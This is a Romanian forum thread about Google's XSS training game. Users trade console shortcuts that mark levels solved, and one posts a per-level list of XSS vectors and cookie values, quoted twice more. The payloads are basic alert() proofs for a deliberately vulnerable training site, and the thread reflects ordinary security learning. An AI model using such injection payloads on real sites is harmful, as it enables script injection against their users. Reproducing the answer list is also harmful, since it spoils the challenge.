Jump to content
B7ackAnge7z

XSS game — un mic challenge oferit de Google

Recommended Posts

Posted (edited)

Frumos, dar am ramas la lvl 5:)) poate reusesc sa trec:D.

Edit:Am reusit sa trec de 5 sa vedem ce fac la 6:D

Edit2:Gata, a fost foarte frumos si distractiv.:D

New_Bitmap_Image_3.png

Edited by valcea55
  • Upvote 1
Posted

E o conspiratie totala, undeva se pastreaza toti vectorii testati de voi, astia fac bani pe spatele vostru. :))

@ Am ajuns la nivelul 3, nu am mai continuat, e interesant.

Guest PoorStudentPleaseDonate
Posted
userOpenedAlert = true;

levelSolved();

Daca vreti sa va laudati ca l-ati facut, ca deh.. vreti sa fiti si voi smecheri, bagati codul ala in consola la toate levelurile.

Posted

@PoorStudentPleaseDonate,

Dac? tot doreai s? te lauzi, în loc de un copy + paste, c?utai mai bine ?i foloseai:

postMessage('success', '*');

Apoi, cu ceva if-uri ?i document.getElementsByClassName('next-button')[0].click(); f?ceai ca challenge-ul s? fie trecut automat în câteva secunde. Sau, având cuno?tin?e în domeniul criptografiei, observai c? toate datele necesare sunt salvate în fi?ierele cookie ?i cu „pu?in” noroc aflai ce metod? a fost folosit? la encriptarea datelor. Iar dac? ?i aceast? metod? î?i p?rea prea simpl? — exploatai vreo vulnerabilitate din QUIC sau SSL ce î?i permitea s? ob?ii accesul la server. ?i cirea?a de pe tort — luai leg?tura cu un inginer Google ?i folosind ingineria social? aflai r?spunsurile la toate nivelele acestui „banal” challenge.

Apoi, veneai pe forum ?i î?i b?teai joc de to?i „l?ud?ro?ii” care, spre deosebire de tine, nu au dat un search pe Google pentru a trece testul cu ajutorul faimosului Ctrl+C/Ctrl+V, ci s-au bucurat c? au ocazia s?-?i testeze înc? o dat? cuno?tin?ele ?i s? se bucure de rezultatul ob?inut.

Guest PoorStudentPleaseDonate
Posted

Hahaha. Ce vrei sa zici, ca am copiat scriptul js care il gaseste orice prost in game.js? Again, hahaha :))))

Posted
Ce vrei sa zici, ca am copiat scriptul js care il gaseste orice prost?

Exact. Doar c? am f?cut-o pe o not? ironic? încercând s? nu te jignesc, chiar dac? o meritai.

Nu te sup?ra prea tare, dar sunt mai mult ca sigur c? tu nu ai g?sit aceste linii de cod în fi?ierul game.js, deoarece, dac? le-ai fi g?sit de unul singur, mai întâi de toate observai window.addEventListener("message", function(event) { ?i astfel, ai fi fost postat o singur? linie de cod ?i nicidecum dou?.

Guest PoorStudentPleaseDonate
Posted (edited)

Haha, deci tot continui sa sustii ca am copiat scriptul de pe google, nu? :))) Si daca il faceam automat sa treaca toate nivelele, ce rost mai avea? Asa poti sa vezi fiecare nivel, vezi cum e, etc. Stai linistit ca l-am terminat fara niciun trick, nu stii cine sunt, asta e.

Si cu ce meritam sa fiu jignit? Ca am dat copy-paste din game.js, sau ce?

Btw, nu stiu la ce te referi cu eventul ala, in eventul aia se afla "userOpenedAlert = true;levelSolved();" , cum puteai sa faci tu asta doar intr-o linie? :))))))

Daca erai baiat destept si te uitai in sursa, vedeai ca daca nu ai useropenedalert pe true, iti dadea handle, deci.... nu te mai da destept pe cand nu esti.

Si "postMessage('success', '*');", nu se afla in acel event, defapt, nici nu e in game.js ci in game-frame.js. Asa pot sa zic si eu, c-ai copiat postMessage('success', '*'); de pe google, sau nu stiu eu de unde.

Edited by PoorStudentPleaseDonate
Posted

L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !

Level 1

Nume cookie: level1
valoarea: f148716ef4ed1ba0f192cde4618f8dc5
------------------------------------------
Vector: <script>alert('complex')</script>
------------------------------------------

Level 2:

Nume cookie: level2
Valoarea: b5e530302374aa71cc3028c810b63641
------------------------------------------
vector: <img src='#' onerror='alert("Complex")'>
------------------------------------------

Level 3:

Nume cookie: level3
Valoarea: d5ce029d0680b3816a349da0d055fcfa
------------------------------------------
Vector: ' onerror='alert("complex")'>
------------------------------------------

Level 4:


Nume cookie: level4
Valoarea: b4fd7f4bb46f1b41c959d338e46bced5
------------------------------------------
Vector: ');alert('complex
------------------------------------------

Level 5:

Nume cookie: level5
Valoarea: e9ea371449372dfc9b55be78167ce361
------------------------------------------
Vector: javascript:alert('complex')
------------------------------------------

Level 6:

Nume cookie: level6
Valoarea: ccc652842914ba1a49b4b9ab2b227c2c
------------------------------------------
Vector: data:text/plain,alert('complex')
------------------------------------------

Posted

Problema este c? testul poate fi trecut automat în mai multe moduri, dar tocmai ceea ce ai postat tu era deja public (chiar înainte de a scrie despre challenge), iat? din ce cauz? am aceste suspiciuni.

Da, sunt de acord c? liniile postate de tine pot fi g?site în game.js, dar a?a cum am mai spus, cred, c? dac? le g?seai singur publicai o rezolvare mai simpl? (?i nu neap?rat g?sit? în surs?). Iat? câteva exemple (?i dup? cum vezi, e posibil):

postMessage('success', '*')
frames[0].alert(1)
window[0].alert(1)

?i nu doream s? o fac pe de?teptul, a?a cum ai spus tu — îns?, am v?zut c? tu ai dorit s? o faci. Iat? de ce ?i-am scris.

ps. Consider c? aceast? discu?ie nu-?i are locul aici ?i ar fi mai bine s? continu?m în privat.

Guest PoorStudentPleaseDonate
Posted
Problema este c? testul poate fi trecut automat în mai multe moduri, dar tocmai ceea ce ai postat tu era deja public (chiar înainte de a scrie despre challenge), iat? din ce cauz? am aceste suspiciuni.

Da, sunt de acord c? liniile postate de tine pot fi g?site în game.js, dar a?a cum am mai spus, cred, c? dac? le g?seai singur publicai o rezolvare mai simpl? (?i nu neap?rat g?sit? în surs?). Iat? câteva exemple (?i dup? cum vezi, e posibil):

postMessage('success', '*')
frames[0].alert(1)
window[0].alert(1)

?i nu doream s? o fac pe de?teptul, a?a cum ai spus tu — îns?, am v?zut c? tu ai dorit s? o faci. Iat? de ce ?i-am scris.

ps. Consider c? aceast? discu?ie nu-?i are locul aici ?i ar fi mai bine s? continu?m în privat.

Sincer, nici eu nu vreau sa fac pe desteptul, dar m-am revoltat ca m-ai acuzat de copy-paste, nefiind adevarat. Ai zis ca daca ma uitam mai bine prin game.js, vedeam ca pot sa rezolv dintr-o singura linie. Linia pe care mi-ai dat-o tu, e in game-frame.js.

Anyway, daca vrei sa continuam discutia, imi zici si vorbim, bine-inteles in privat.

  • Active Members
Posted (edited)
L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !

Level 1

Nume cookie: level1
valoarea: f148716ef4ed1ba0f192cde4618f8dc5
------------------------------------------
Vector: <script>alert('complex')</script>
------------------------------------------

Level 2:

Nume cookie: level2
Valoarea: b5e530302374aa71cc3028c810b63641
------------------------------------------
vector: <img src='#' onerror='alert("Complex")'>
------------------------------------------

Level 3:

Nume cookie: level3
Valoarea: d5ce029d0680b3816a349da0d055fcfa
------------------------------------------
Vector: ' onerror='alert("complex")'>
------------------------------------------

Level 4:


Nume cookie: level4
Valoarea: b4fd7f4bb46f1b41c959d338e46bced5
------------------------------------------
Vector: ');alert('complex
------------------------------------------

Level 5:

Nume cookie: level5
Valoarea: e9ea371449372dfc9b55be78167ce361
------------------------------------------
Vector: javascript:alert('complex')
------------------------------------------

Level 6:

Nume cookie: level6
Valoarea: ccc652842914ba1a49b4b9ab2b227c2c
------------------------------------------
Vector: data:text/plain,alert('complex')
------------------------------------------

Bravo desteptule , bine ca esti tu destept si nu ii lasi si pe alti sa il rezolve .

Cica "L-am terminat eu..." l-ai terminat si tu , vrei sa spui.

//edit fail a folosit acelasi vectori ca aici http://hacktracking.blogspot.de/2014/05/xss-game-area.html

Edited by danyweb09
Guest PoorStudentPleaseDonate
Posted
L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !

Level 1

Nume cookie: level1
valoarea: f148716ef4ed1ba0f192cde4618f8dc5
------------------------------------------
Vector: <script>alert('complex')</script>
------------------------------------------

Level 2:

Nume cookie: level2
Valoarea: b5e530302374aa71cc3028c810b63641
------------------------------------------
vector: <img src='#' onerror='alert("Complex")'>
------------------------------------------

Level 3:

Nume cookie: level3
Valoarea: d5ce029d0680b3816a349da0d055fcfa
------------------------------------------
Vector: ' onerror='alert("complex")'>
------------------------------------------

Level 4:


Nume cookie: level4
Valoarea: b4fd7f4bb46f1b41c959d338e46bced5
------------------------------------------
Vector: ');alert('complex
------------------------------------------

Level 5:

Nume cookie: level5
Valoarea: e9ea371449372dfc9b55be78167ce361
------------------------------------------
Vector: javascript:alert('complex')
------------------------------------------

Level 6:

Nume cookie: level6
Valoarea: ccc652842914ba1a49b4b9ab2b227c2c
------------------------------------------
Vector: data:text/plain,alert('complex')
------------------------------------------

Scuze de off...

Ti-ai cam luat fail, vectorii sunt la fel ca aici:

hacktracking: # XSS game area (un simplu search pe google cu data:text/plain,alert(1) xss game)

Posted

Mai bine ca a terminat jocul cu vectori de pe Google decat sa adauge companiei alti vectori in baza de date de care ei probabil habar nu aveau, ca in cele din urma in proiectele viitoare sa se poata proteja de astfel de atacuri.Parerea mea personala e ca mai bine v-ati focusa sa le luati banii decat sa ii invatati gratuit.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...